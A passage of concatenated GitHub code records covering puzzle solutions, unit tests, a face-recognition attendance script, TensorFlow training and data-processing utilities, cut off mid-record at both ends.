arent on floor one\n #If nothing is in the elevator\n #pick up to two items (have to figure out logic here)\n #check danger, if ok continue, if not choose two different items\n #maybe check if the items can go up or down a level and be safe as well?\n #if something is in elevator\n #determine whether it needs to go up or down\n #bring the item up or down\n #unload the items (if it is safe to do so)\n","repo_name":"EnderFlop/advent_of_code","sub_path":"2016/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32479260298","text":"import unittest\nimport L0028_Implement_strStr as leet\n\nclass L0028_Implement_strStrTest(unittest.TestCase):\n def test_1(self):\n _s = leet.Solution()\n haystack = \"hello\"\n needle = \"ll\"\n expect = 2\n actual = _s.strStr(haystack,needle)\n self.assertEqual(expect, actual)\n\n def test_2(self):\n _s = leet.Solution()\n haystack = \"aaaaa\"\n needle = \"bba\"\n expect = -1\n actual = _s.strStr(haystack,needle)\n self.assertEqual(expect, actual)\n\n def test_3(self):\n _s = leet.Solution()\n haystack = \"mississippi\"\n needle = \"issip\"\n expect = 4\n actual = _s.strStr(haystack, needle)\n self.assertEqual(expect, actual)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"waking999/machine_learning","sub_path":"LeetCode/easy/L0028_Implement_strStr/L0028_Implement_strStrTest.py","file_name":"L0028_Implement_strStrTest.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9093549138","text":"def load_data(filename):\n with open(filename) as f:\n data = f.readline()\n data = data.strip()\n data = data.split(',')\n data = [int(x) for x in data]\n return data\n\n\ndef genearte_fishes(data, days=256):\n print('Initial state: ', data)\n yung_fishes_index = []\n for i in range(days):\n for fish in range(len(data)):\n if data[fish] == 0:\n data[fish] = 6\n data.append(8)\n else:\n # print(f'yes {data[fish]=}')\n data[fish] -= 1\n # print('After', i + 1, ' day:', data)\n return data\n\n\n# filename = 'test-input.txt'\nfilename = 'input.txt'\n\ndata = load_data(filename)\ndata2 = genearte_fishes(data)\nprint(len(data2))\n","repo_name":"lapssh/advent_of_code","sub_path":"2021/day06/06-lanternfish.py","file_name":"06-lanternfish.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15059140692","text":"# -*- coding: utf-8 -*-\nimport random\nimport math\n\nclass Person:\n\n def __init__(self, registration, type, cash):\n self.registration = registration\n self.type = type\n self.cash = cash\n\n def has_cash(self, price):\n return self.cash - price >= 0\n\n def meal_price(self):\n\n meal_prices = {\n 'Employee': 13.00,\n 'Student': 5.20,\n }\n\n return meal_prices[self.type]\n\n def breakfast_price(self):\n\n breakfast_prices = {\n 'Employee': 13.00,\n 'Student': 5.20,\n }\n\n return breakfast_prices[self.type]\n\n def discount_meal_price(self):\n\n if self.has_cash(self.meal_price()):\n self.cash -= self.meal_price()\n\n else:\n print(\"\\nDINHEIRO INSUFICIENTE!!! OPERAÇÃO CANCELADA\\n\")\n\n def discount_breakfast_price(self):\n\n if self.has_cash(self.breakfast_price()):\n self.cash -= self.breakfast_price()\n\n else:\n print(\"\\nDINHEIRO INSUFICIENTE!!! 
OPERAÇÃO CANCELADA\\n\")\n\n def insert_cash(self, cash):\n self.cash += cash\n\n\n\ndef generate_people():\n\n people = []\n\n for i in range(5000):\n registration = random.randint(100000001, 180000001)\n cash = random.randint(1, 100)\n types = ['Employee', 'Student']\n type = random.choice(types)\n people.append(Person(registration, type, cash))\n\n return people\n\n\ndef insertionSort(people):\n for index in range(1,len(people)):\n\n current_person = people[index]\n current_registration = people[index].registration\n position = index\n\n while position > 0 and people[position-1].registration > current_registration:\n people[position] = people[position-1]\n position = position-1\n\n people[position] = current_person\n\n\ndef remove_duplicates(people):\n seen = set()\n seen_add = seen.add\n return [x for x in people if not (x.registration in seen or seen_add(x.registration))]\n\n\ndef write_to_file(people):\n file = open(\"matriculas.txt\",\"w\")\n for p in people:\n file.write(str(p.registration) + \" \" + p.type + \" \" + str(p.cash) + \"\\n\")\n file.close()\n\n\ndef search(registration, people_list):\n\n lower_index = 0\n upper_index = people_list.__len__() - 1\n\n while lower_index <= upper_index:\n\n middle_index = math.floor((upper_index + lower_index) / 2)\n\n current_person = people_list[middle_index]\n\n if current_person.registration == registration:\n return current_person\n\n elif current_person.registration > registration:\n upper_index = middle_index - 1\n\n else:\n lower_index = middle_index + 1\n\n return None\n\n\n##################################################################\n\npeople = generate_people() # generates random students and employess\n#people.sort(key=lambda p: p.registration, reverse=False)\ninsertionSort(people) #ordenate by registration\npeople = remove_duplicates(people) # remove people with the same registrarion\nwrite_to_file(people) # writes the people data to matriculas.txt\n\nwhile True:\n registration = int(input(\"Digite a matricula do estudante/funcionário: \"))\n person = search(registration, people) #binary search by registration\n\n if person is not None:\n\n print(\"\\nMatrícula encontrada! Tipo: \" + person.type + \"\\n\")\n\n while True:\n\n option = int(input(\"\\nO que deseja fazer?\\n(1)Ver saldo\\n(2)Inserir créditos\\n(3)Descontar café da manhã\\n(4)Descontar almoço/jantar\\n(5)Sair do registro de \" + str(person.registration) + \"\\n\"))\n\n if option == 1:\n print(\"\\nSaldo atual: \" + str(person.cash))\n\n elif option == 2:\n cash = float(input(\"Digite o valor a ser inserido: \"))\n\n print(\"\\nSaldo anterior: \" + str(person.cash))\n person.insert_cash(cash)\n\n print(\"\\nSaldo atual: \" + str(person.cash))\n write_to_file(people)\n\n elif option == 3:\n\n print(\"\\nSaldo anterior: \" + str(person.cash))\n person.discount_breakfast_price()\n\n print(\"\\nSaldo atual: \" + str(person.cash))\n write_to_file(people)\n\n elif option == 4:\n\n print(\"\\nSaldo anterior: \" + str(person.cash))\n person.discount_meal_price()\n\n print(\"\\nSaldo atual: \" + str(person.cash))\n write_to_file(people)\n\n elif option == 5:\n break\n\n else:\n print(\"Opção inexistente! 
Tente novamente\")\n\n    else:\n        print(\"Matrícula não encontrada!\")\n\n\n    option = input(\"Deseja fazer uma nova busca (s)/(n)?\")\n\n    if option == \"n\":\n        break\n","repo_name":"EDAII/Lista1e2--BuscaEOrdenacao","sub_path":"lista1_2_busca_ordenacao.py","file_name":"lista1_2_busca_ordenacao.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"71913647548","text":"import numpy as np\nimport networkx as nx\nimport f_info\nfrom itertools import combinations\nfrom f_info import *\n\ndef create_params(Na, dim_a, max_iter, upb, lwb):\n    # create matrices Q and r\n    A = np.zeros((dim_a, Na))\n    for i in range(Na):\n        random_colum = np.random.randint(1, 5, dim_a)\n        A[:,i] = random_colum\n    \n    random_matrix = np.random.randint(1, 6, size=(dim_a,dim_a))\n    Q = np.zeros((dim_a, Na*dim_a))\n    S,_ = np.linalg.qr(random_matrix)\n    for i in range(Na):\n        Q_i = S.T@np.diag(A[:,i])@S # Q_i & Q have different address\n        Q[:, i*dim_a:(i+1)*dim_a] = Q_i\n    \n\n    r = np.random.normal(0, 1, size=(1,Na))\n\n    # set initial value\n    initial_tem = np.zeros((dim_a, Na))\n    for i in range(Na):\n        current_upb = upb[:, i]\n        current_lwb = lwb[:, i]\n        for j in range(dim_a):\n            initial_tem[j, i] = np.random.randint(current_lwb, current_upb, 1)\n\n    initial_sum = np.sum(initial_tem, 1)\n    agent_initial = 1/Na*initial_sum\n    y_initial = agent_initial # same address\n\n    # calculate initial g and f\n    x = np.zeros((Na*dim_a, Na*max_iter))\n    g = np.zeros((Na*dim_a, Na*max_iter))\n    f = np.zeros((Na, Na*max_iter))\n    Q_sum = np.zeros((dim_a, dim_a))\n    for i in range(Na):\n        x[i*dim_a:(i+1)*dim_a, i*max_iter] = agent_initial\n        Q_current = Q[:, i*dim_a:(i+1)*dim_a]\n        Q_sum = Q_sum + Q_current\n        r_t_current = r[:, i]\n        g_current = f_info.f_gradient(agent_initial, Q_current, r_t_current)\n        g[i*dim_a:(i+1)*dim_a, i*max_iter] = g_current\n        f_current = f_info.f_value(agent_initial, Q_current, r_t_current)\n        f[i, i*max_iter] = f_current\n\n    x_star = np.zeros((dim_a,1))\n    f_val = x_star.T @ Q_sum @ x_star + np.sum(r) * np.linalg.norm(x_star)\n\n    agent = {'x': x, \n             'y_initial': y_initial, \n             'g': g, \n             'f': f,\n             'Q': Q, \n             'rT': r,\n             'x_star': x_star,\n             'f_star': f_val,\n             'lower_bound': lwb,\n             'upper_bound': upb,\n             'dimension': dim_a}\n    \n    return agent\n\ndef agent_slice(agent, agent_idx, current_step, max_iter, Ga):\n    x = agent['x']\n    g = agent['g']\n    f = agent['f']\n    Q = agent['Q']\n    r = agent['rT']\n    dim = agent['dimension']\n    topo = Ga[:,agent_idx]\n    N_Ga = np.size(Ga, 0)\n\n    current_x = x[:, agent_idx*max_iter:(agent_idx+1)*max_iter]\n    current_g = g[:, agent_idx*max_iter:(agent_idx+1)*max_iter]\n    current_f = f[:, agent_idx*max_iter:(agent_idx+1)*max_iter]\n    for i in range(N_Ga):\n        if topo[i] != 0:\n            current_x[i*dim:(i+1)*dim, current_step-1] = x[i*dim:(i+1)*dim, i*max_iter+current_step-1]\n            current_g[i*dim:(i+1)*dim, current_step-1] = g[i*dim:(i+1)*dim, i*max_iter+current_step-1] \n            current_f[i, current_step-1] = f[i, i*max_iter+current_step-1] \n        else: # no fresh data from agent i this step: carry the previous step forward\n            current_x[i*dim:(i+1)*dim, current_step-1] = current_x[i*dim:(i+1)*dim, current_step-2]\n            current_g[i*dim:(i+1)*dim,current_step-1] = current_g[i*dim:(i+1)*dim, current_step-2]\n            current_f[i, current_step-1] = current_f[i, current_step-2] \n\n    \n    current_agent = {'x_memory': current_x, \n                     'g_memory': current_g, \n                     'f_memory': current_f,\n                     'Q':Q[:, agent_idx*dim:(agent_idx+1)*dim], \n                     'rT':r[:, agent_idx],\n                     'topo': topo,\n                     }\n\n    return current_agent\n
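\n# note: a single row normalisation followed by a single column normalisation only\n# approximates a doubly stochastic matrix; an exact result would need repeated (Sinkhorn) passes\ndef 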
Set_fully_connected(n):\n full_matrix = np.random.rand(n, n) # Generate random non-negative matrix\n full_matrix /= full_matrix.sum(axis=1)[:, np.newaxis] # Normalize rows to ensure the sum of each row is 1\n full_matrix /= full_matrix.sum(axis=0) # Normalize columns to ensure the sum of each column is 1\n return full_matrix\n\ndef find_longest_combination_in_different_rows_and_columns(positions):\n longest_combination = []\n\n for r in range(2, len(positions) + 1): # Start from pairs, up to the total number of positions\n for combination in combinations(positions, r): # Check if each point is in a different row and column \n if all(combination[i][0] != combination[j][0] and combination[i][1] != combination[j][1]\n for i in range(r) for j in range(i + 1, r)):\n longest_combination = combination\n\n return longest_combination\n\ndef GRPdur(n): # generate index\n p = np.arange(0, n) # Start with Identity permutation\n\n for k in range(n, 0, -1):\n r = np.random.randint(0, k) # random integer between 1 and k\n t = p[k-1]\n p[k-1] = p[r-1] # Swap(p(r),p(k)).\n p[r-1] = t\n\n return p\n\ndef create_Graph(n,idx_pre, T):\n positions_row, positions_col = np.where(idx_pre == T) # extract positions where the weights cannot be zero again\n # Generate a random doubly stochastic adjacency matrix\n c = np.random.rand(1, n)\n c = c / np.sum(c)\n weighted_adjacency_matrix = np.zeros((n,n))\n weighted_adjacency_matrix[range(n), range(n)] = c[0, 0] # assign diagnal\n if bool(np.size(positions_row) > 0): # there are positions that cannot be zero\n positions = list(zip(positions_row, positions_col))\n count = 1\n while bool(positions): # The list is not empty\n acceptable_postions = find_longest_combination_in_different_rows_and_columns(positions) # find positions in different row and col\n if count < n:\n if len(acceptable_postions) >= n:\n pos_to_assign = acceptable_postions[:n] # Choose the first n tuples \n p_r, p_c = zip(*pos_to_assign) # Separate x and y coordinates into two arrays\n p_r = np.array(p_r)\n p_c = np.array(p_c)\n weighted_adjacency_matrix[p_r, p_c] += c[0, count]\n count += 1\n set_a = set(positions) # delete used tuples in 'positions' list\n set_b = set(acceptable_postions)\n result = set_a.symmetric_difference(set_b)\n positions = list(result)\n else:\n pos_to_assign = acceptable_postions # Choose all tuples\n p_r, p_c = zip(*pos_to_assign) # Separate x and y coordinates into two arrays\n p_r = np.array(p_r)\n p_c = np.array(p_c) \n missing_elements_in_row = [element for element in range(n) if element not in p_r] # Find missing elements\n missing_elements_in_col = [element for element in range(n) if element not in p_c] # Find missing elements\n p_r = np.append(p_r, missing_elements_in_row, axis=0) # Append missing elements to the existing list\n p_c = np.append(p_c, missing_elements_in_col, axis=0) # Append missing elements to the existing list\n weighted_adjacency_matrix[p_r, p_c] += c[0, count]\n count += 1\n positions = []\n else:\n weighted_adjacency_matrix = Set_fully_connected(n)\n print(\"fully connected graph\")\n return weighted_adjacency_matrix\n \n for i in range(n-count-1, n):\n p_r = GRPdur(n) # row index\n p_c = p_r[::-1] # colum index\n weighted_adjacency_matrix[p_r, p_c] += c[0, i]\n\n else: # randomly selected doubly stochastic matrix without restrictions\n for i in range(1, n):\n p_r = GRPdur(n) # row index\n p_c = p_r[::-1] # colum index\n weighted_adjacency_matrix[p_r, p_c] += c[0, i]\n\n # update idx_pre\n idx_current = np.copy(idx_pre) # initialise idx_current\n 
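# track how many consecutive rounds each edge weight has stayed at zero\n    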
idx_zero_new_row, idx_zero_new_col = np.where(weighted_adjacency_matrix == 0) # find idx of zero entries\n idx_current[idx_zero_new_row, idx_zero_new_col] += 1 # update idx of zero entries\n idx_reset_row, idx_reset_col = np.where(idx_pre == idx_current)\n idx_current[idx_reset_row, idx_reset_col] = 0\n \n return weighted_adjacency_matrix, idx_current\n\ndef update_graph(k, Na, T, idx_zero):\n if k == 2:\n Ga = 1/Na*np.ones((Na, Na))\n else:\n Ga, idx_zero = create_Graph(Na, idx_zero, T)\n return Ga, idx_zero\n\n #print('Graph is:\\n', Ga)\n #print('zero position matrix is:\\n', idx_zero)\n\ndef communication(Na, agent_all, k, max_iter, Ga):\n for i in range(Na):\n update = agent_slice(agent_all, i, k-1, max_iter, Ga)\n update_x = update['x_memory']\n update_g = update['g_memory']\n update_f = update['f_memory']\n x = agent_all['x']\n g = agent_all['g']\n f = agent_all['f']\n x[:, i*max_iter+k-1] = update_x[:, k-1]\n g[:, i*max_iter+k-1] = update_g[:, k-1]\n f[:, i*max_iter+k-1] = update_f[:, k-1]\n return agent_all\n \n\n \n\n\n\n\n\n","repo_name":"zty0312/Distributed-Cutting-Plane-Consensus","sub_path":"create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":8918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71643635707","text":"import numpy as np\nfrom astropy.table import QTable\nimport astropy.units as u\n\n# read in the Valencic et al. 2004 data and write the common format table\nif __name__ == \"__main__\":\n # get the Valencic04 results\n val04_dust = QTable.read(\"Valencic04/valencic04_datafile4.txt\", format=\"ascii.cds\")\n val04_fm = QTable.read(\"Valencic04/valencic04_datafile5.txt\", format=\"ascii.cds\")\n\n otab = QTable()\n otab[\"AV\"] = np.array(val04_dust[\"A(V)\"]) * u.mag\n otab[\"EBV\"] = np.array(val04_dust[\"E(B-V)\"]) * u.mag\n rv = np.array(val04_dust[\"R(V)\"])\n otab[\"RV\"] = rv\n\n otab[\"C1\"] = (np.array(val04_fm[\"c1/R(V)+1.0\"]) - 1.0) * rv\n otab[\"C2\"] = np.array(val04_fm[\"c2/R(V)\"]) * rv\n otab[\"C3\"] = np.array(val04_fm[\"c3/R(V)\"]) * rv\n otab[\"C4\"] = np.array(val04_fm[\"c4/R(V)\"]) * rv\n otab[\"x0\"] = np.array(val04_fm[\"x0\"]) / u.micron\n otab[\"gamma\"] = np.array(val04_fm[\"gamma\"]) / u.micron\n\n otab.write(\"val04_ensemble_params.dat\", format=\"ascii.ipac\", overwrite=True)\n","repo_name":"karllark/extinction_ensemble_props","sub_path":"data/process_val04.py","file_name":"process_val04.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13415168712","text":"from pprint import pprint\nfrom collections import defaultdict, Counter\nfrom functools import cache\n\n\ndef readlines():\n with open(\"./input/day14.txt\") as f:\n for line in f.readlines():\n yield line.strip()\n\n\ndef pairs(s):\n for i in range(len(s)):\n yield s[i : i + 2]\n\n\ndef step(template, rules):\n ps = (s[0] + rules[s] + s[0] for s in pairs(template))\n return \"\".join((p[:-1] for p in ps))\n\n\ndef parse(lines):\n template = next(lines)\n next(lines)\n rules = defaultdict(str)\n for line in lines:\n pair, insertion = line.split(\" -> \")\n rules[pair] = insertion\n return template, rules\n\n\ndef solve_one():\n template, rules = parse(readlines())\n for _ in range(10):\n template = step(template, rules)\n counts = Counter(template)\n low = min(counts.values())\n high = max(counts.values())\n return high - low\n\n\ndef expand_counts(template, rules, n):\n @cache\n def 
expand_pair(pair, n):\n        if n == 0 or pair not in rules:\n            return Counter()\n        else:\n            return (\n                expand_pair(pair[0] + rules[pair], n - 1)\n                + Counter({rules[pair]: 1})\n                + expand_pair(rules[pair] + pair[1], n - 1)\n            )\n\n    def full_expand(template, n):\n        counts = Counter()\n        prev = next(template)\n        for c in template:\n            counts += Counter({prev: 1})\n            counts += expand_pair(prev + c, n)\n            prev = c\n        counts += Counter({prev: 1})\n        return counts\n\n    return full_expand((c for c in template), n)\n\n\ndef solve_two():\n    template, rules = parse(readlines())\n    counts = expand_counts(template, rules, 40)\n    low = min(counts.values())\n    high = max(counts.values())\n    return high - low\n\n\nif __name__ == \"__main__\":\n    pprint(solve_one())\n    pprint(solve_two())\n","repo_name":"tommy/adventofcode","sub_path":"src/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"17635665657","text":"import face_recognition\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nfrom datetime import datetime\r\n\r\n\r\n# import the known face images\r\npath = 'Attendence'\r\nimages = []\r\nclassNames = []\r\nmylist = os.listdir(path)\r\nprint(mylist)\r\n\r\nfor cls in mylist:\r\n    currImg = cv2.imread(f'{path}/{cls}')\r\n    images.append(currImg)\r\n    classNames.append(os.path.splitext(cls)[0])\r\nprint(classNames)\r\n\r\n\r\n# encode the known images\r\ndef Encodings(images):\r\n    encodelist = []\r\n    for img in images:\r\n        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n        encode = face_recognition.face_encodings(img)[0]\r\n        encodelist.append(encode)\r\n    return encodelist\r\n\r\ndef markingattendence(name):\r\n    with open('attendecesheet.csv','r+') as f:\r\n        mydatalist = f.readlines()\r\n        namelist = []\r\n        for line in mydatalist:\r\n            entry = line.split(',')\r\n            namelist.append(entry[0])\r\n        if name not in namelist:\r\n            now = datetime.now()\r\n            dtstring = now.strftime('%H:%M:%S')\r\n            f.writelines(f'\\n{name},{dtstring}')\r\n\r\n\r\n\r\nencodelistknown = Encodings(images)\r\nprint('Encoding Done')\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n    success, img = cap.read()\r\n    if not success:  # no camera frame available\r\n        break\r\n    imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\r\n    imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\r\n\r\n    Facesincurrframe = face_recognition.face_locations(imgS)\r\n    encodecurrframe = face_recognition.face_encodings(imgS,Facesincurrframe)\r\n\r\n    for encodeface,faceloc in zip(encodecurrframe,Facesincurrframe):\r\n        matches = face_recognition.compare_faces(encodelistknown,encodeface)\r\n        facedis = face_recognition.face_distance(encodelistknown,encodeface)\r\n        print(facedis)\r\n        matchindex = np.argmin(facedis)\r\n\r\n        if matches[matchindex]:\r\n            name = classNames[matchindex].upper()\r\n            print(name)\r\n            y1,x2,y2,x1 = faceloc\r\n            y1, x2, y2, x1 = y1*4, x2*4, y2*4, x1*4  # scale back up: detection ran on a quarter-size frame\r\n            cv2.rectangle(img,(x1,y1),(x2,y2),(0,255,0),3)\r\n            cv2.putText(img,name,(x1+6,y2-6),cv2.FONT_ITALIC,2,(255,255,255),2)\r\n            markingattendence(name)\r\n\r\n\r\n    cv2.imshow('webcam',img)\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):  # press 'q' to quit; a bare waitKey(1) gave no way to exit\r\n        break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"akashrane/Automatic_FaceRecognition_Attendance_System","sub_path":"Attendence.py","file_name":"Attendence.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"31611953467","text":"from tests import mock, BaseTestCase\n# from mock import Mock\nimport boto3\nimport base64\n# import placebo\n# import types\nimport logging\n\nimport 
check_cloudwatch_alarms\n\n\nclass TestCheckCloudWatchAlarms(BaseTestCase):\n\n    OK = 0\n    WARNING = 1\n    CRITICAL = 2\n    UNKNOWN = 3\n\n    def test_filter_alarms(self):\n        class MockAlarm:\n            def __init__(self, name):\n                self.name = name\n        filter1 = 'sky-cw.*staging'\n        filter2 = 'sky-cw.*production'\n        alarms = [MockAlarm('sky-cw-addapp-ecs-staging-01')]\n        self.assertEqual(1, len(check_cloudwatch_alarms.filter_alarms(alarms)))\n        self.assertEqual(1, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n        alarms.append(MockAlarm('other-cw-addapp-ecs-staging-01'))\n        self.assertEqual(1, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n        alarms.append(MockAlarm('sky-cw-text-addapp-ecs-staging-02'))\n        self.assertEqual(2, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n        alarms.append(MockAlarm('sky-cw-text-addapp-ecs-production-02'))\n        self.assertEqual(2, len(check_cloudwatch_alarms.filter_alarms(alarms, filter1)))\n        self.assertEqual(1, len(check_cloudwatch_alarms.filter_alarms(alarms, filter2)))\n\n    def test_check_status(self):\n        alarms = []\n        cloudwatch = boto3.resource('cloudwatch')\n        alarm = cloudwatch.Alarm('name')\n        alarms.append(alarm)\n        self.assertEqual(check_cloudwatch_alarms.CRITICAL, check_cloudwatch_alarms.check_status(alarms, \"ERROR\"))\n        self.assertEqual(check_cloudwatch_alarms.WARNING, check_cloudwatch_alarms.check_status(alarms, \"ERROR\", True))\n\n        self.assertEqual(check_cloudwatch_alarms.WARNING, check_cloudwatch_alarms.check_status(alarms, \"OK\"))\n        alarms = []\n        self.assertEqual(check_cloudwatch_alarms.OK, check_cloudwatch_alarms.check_status(alarms, \"ERROR\"))\n\n    def test_get_alarm_filter_expression(self):\n        class MockArgs:\n            alarmFilterExpressionEncoded = None\n            alarmFilterExpression = None\n            def __init__(self, alarmFilterExpression, alarmFilterExpressionEncoded):\n                self.alarmFilterExpression = alarmFilterExpression\n                self.alarmFilterExpressionEncoded = alarmFilterExpressionEncoded\n        expression = \"sky-cw.*staging\"\n        exprEncoded = base64.b64encode(expression.encode()).decode()  # b64encode needs bytes; decode back to str for printing\n        print(\"expr staging:\" + expression)\n        print(\"exprEncoded staging:\" + exprEncoded)\n        print(\"expr production:\" + \"sky-cw.*production\")\n        print(\"exprEncoded production:\" + base64.b64encode(b\"sky-cw.*production\").decode())\n        # exprEncoded staging:c2t5LWN3LipzdGFnaW5n\n        # exprEncoded production:c2t5LWN3Lipwcm9kdWN0aW9u\n\n        args = MockArgs(None, exprEncoded)\n        self.assertEqual(expression, check_cloudwatch_alarms.get_alarm_filter_expression(args))\n        args = MockArgs(expression, None)\n        self.assertEqual(expression, check_cloudwatch_alarms.get_alarm_filter_expression(args))\n","repo_name":"skyscrapers/monitoring-plugins","sub_path":"tests/unit/test_check_cloudwatch_alarms.py","file_name":"test_check_cloudwatch_alarms.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"}
{"seq_id":"4904942183","text":"import tensorflow as tf\nimport numpy as np\n\nclass Trainer(object):\n    def __init__(self, config, model_obj):\n        self.config = config\n        self.model = model_obj\n\n    def get_train_op(self, loss, params, start_learning_rate, base_learning_rate, warmup_steps, hidden_size,\n                     l2_rate=0.0001, clip_gradient_norm=5,\n                     optimizer='adam',\n                     scope=\"\"):\n        # add training op\n        with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n            self.global_step = tf.train.get_or_create_global_step()\n\n            loss_l2 = tf.add_n([tf.nn.l2_loss(p) for p in params]) * l2_rate\n            loss += loss_l2\n\n            slope = (base_learning_rate - start_learning_rate) 
/ warmup_steps\n            warmup_rate = slope * tf.cast(self.global_step,\n                                          tf.float32) + start_learning_rate\n\n            if self.config.decay_learning_rate:\n                decay_learning_rate = tf.train.exponential_decay(base_learning_rate, self.global_step,\n                                                                 1000, 0.98, staircase=False)\n                # decay_learning_rate = tf.train.cosine_decay_restarts(base_learning_rate, self.global_step,\n                #                                                      1000)\n            else:\n                decay_learning_rate = base_learning_rate\n\n            learning_rate = tf.where(self.global_step < warmup_steps, warmup_rate,\n                                     decay_learning_rate)\n\n            # warmup_steps = tf.to_float(warmup_steps)\n            # step = tf.to_float(tf.train.get_or_create_global_step())\n            #\n            # learning_rate = base_learning_rate * (hidden_size ** -0.5)\n            # # Apply linear warmup\n            # learning_rate *= tf.minimum(1.0, step / warmup_steps)\n            # # Apply rsqrt decay\n            # learning_rate *= tf.rsqrt(tf.maximum(step, warmup_steps))\n\n\n            if optimizer == 'adam':\n                opt = tf.contrib.opt.LazyAdamOptimizer(\n                    #weight_decay=l2_rate,\n                    learning_rate=learning_rate,\n                    beta1=self.model.hparams.optimizer_adam_beta1,\n                    beta2=self.model.hparams.optimizer_adam_beta2,\n                    epsilon=self.model.hparams.optimizer_adam_epsilon)\n            elif optimizer == 'rmsprop':\n                opt = tf.train.RMSPropOptimizer(learning_rate=learning_rate)\n            elif optimizer == 'sgd':\n                opt = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n\n\n            grads_and_vars = opt.compute_gradients(loss, params)\n            gradients, variables = zip(*grads_and_vars)\n            if clip_gradient_norm > 0:\n                gradients, _ = tf.clip_by_global_norm(gradients, clip_gradient_norm)\n            self.param_norm = tf.global_norm(params)\n\n            # Include batch norm mean and variance in gradient descent updates\n            update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n            updates = opt.apply_gradients(zip(gradients, params), global_step=self.global_step)\n\n            # Create an ExponentialMovingAverage object\n            ema = tf.train.ExponentialMovingAverage(decay=0.9999)\n\n            with tf.control_dependencies([updates]+update_ops):\n                training_op = ema.apply(params)\n\n        return training_op, learning_rate\n\n\n    def train(self):\n\n        update_op, scaffold, train_output_dic, _, _ = self.build_train_graph()\n        with tf.train.MonitoredTrainingSession(checkpoint_dir=self.config.save_dir, scaffold=scaffold,\n                                               config=tf.ConfigProto(\n                                                   allow_soft_placement=True, log_device_placement=True)\n                                               ) as sess:\n            #tf.logging.info(\"start training:\")\n            #tf.logging.info(self.config.training_iterations)\n            for _ in range(self.config.training_iterations):\n                sess.run(update_op)\n\n\n\n    def get_data_iterators(self):\n        raise NotImplementedError()\n\n    def build_train_graph(self):\n        raise NotImplementedError()\n\n    def build_eval_graph(self):\n        raise NotImplementedError()","repo_name":"samiraabnar/SolutionDistillation","sub_path":"distill/pipelines/basic_trainer.py","file_name":"basic_trainer.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"22137942871","text":"import pandas as pd\nimport numpy as np\nfrom random import uniform\nfrom collections import Counter\n\nMODEL_BASED = \"industry_type\"\nDATA_PATH = \"data/formatted/\"\n\nraw_path_file_ad_log = \"data/raw/ad_log.tsv.0063_part_00.gz\"\nraw_path_file_campaign = \"data/raw/campaign_data_hust_2018_autumn_eng.csv\"\nraw_path_file_url = \"data/raw/url_category_hust_2018_autumn.csv\"\n\nF_PATH_FILE_AD_LOG = \"data/formatted/ad_log.csv\"\nF_PATH_FILE_CAMPAIGN = \"data/formatted/campaign_2018_autumn.csv\"\n\nad_log_header = [\"view_datetime\", \"user_id\", \"purl_subdomain\", 
\"purl_base\", \"os\", \"device\", \"source_log_nm\",\n                 \"advertiser_id\", \"campaign_id\", \"flight_id\", \"ip_address\"]\n\n#### 1. Handle the biggest data file\n# # Handle ad_log_file: read the whole file, but in separate chunks\n# chunksize = 100000\n# df_iter = pd.read_csv(raw_path_file_ad_log, delimiter = \"\\t\", chunksize=chunksize, iterator=True)\n# for iter_num, chunk in enumerate(df_iter, 0):\n#     print(\"Processing chunk: \", iter_num)\n#     saved = chunk[chunk[\"advertiser_id\"]!= 0]\n#     saved.to_csv(F_PATH_FILE_AD_LOG, header=None, sep=',', mode='a', index=False, encoding='utf-8')\n\n\n## Handle campaign_file\n# df_cp = pd.read_csv(raw_path_file_campaign, header=0, delimiter = ',', error_bad_lines=False)\n# # ,No.,FlightID,advertiser_id,campaign_id,Campaign Name,キャンペーン名,Line Item Name,ラインアイテム名,Type of industry,業種,RTB) campaign merchandise,RTB)キャンペーン商材,OTrans,RTB)キャンペーン商材(詳細)\n# cp_header = [\"flight_id\", \"advertiser_id\", \"campaign_id\", \"campaign_name_eng\", \"campaign_name_jp\",\n#              \"viewer_type_eng\", \"viewer_type_jp\", \"industry_type_eng\", \"industry_type_jp\",\n#              \"rtb_campaign_material_eng\", \"rtb_campaign_material_jp\", \"campaign_product_eng\", \"campaign_product_details_jp\"]\n# df_cp = df_cp.iloc[:, 2:]\n# df_cp.to_csv(F_PATH_FILE_CAMPAIGN, header=cp_header, sep=',', index=False, encoding='utf-8')\n\n\n#### 2. Join tables\ndf1 